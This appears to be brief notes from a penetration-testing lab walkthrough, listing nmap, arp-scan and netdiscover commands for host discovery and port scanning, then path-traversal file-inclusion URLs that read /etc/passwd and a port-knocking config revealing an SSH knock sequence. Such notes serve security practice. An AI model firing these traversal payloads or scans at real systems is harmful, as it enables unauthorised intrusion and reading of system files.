I. Host discovery
1. nmap -sP 192.168.178.1/24 // ping scan of the /24 (class C) segment
2. arp-scan -l // feels a bit faster
3. netdiscover -p

II. Port scanning
1. nmap -p 1-65535 -A 192.168.178.133
   nmap -sV <lab target IP>

1. File inclusion: http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd
2. Port-knocking service: http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf
   [options]
   UseSyslog
   [openSSH]
   sequence = 7469,8475,9842
   seq_timeout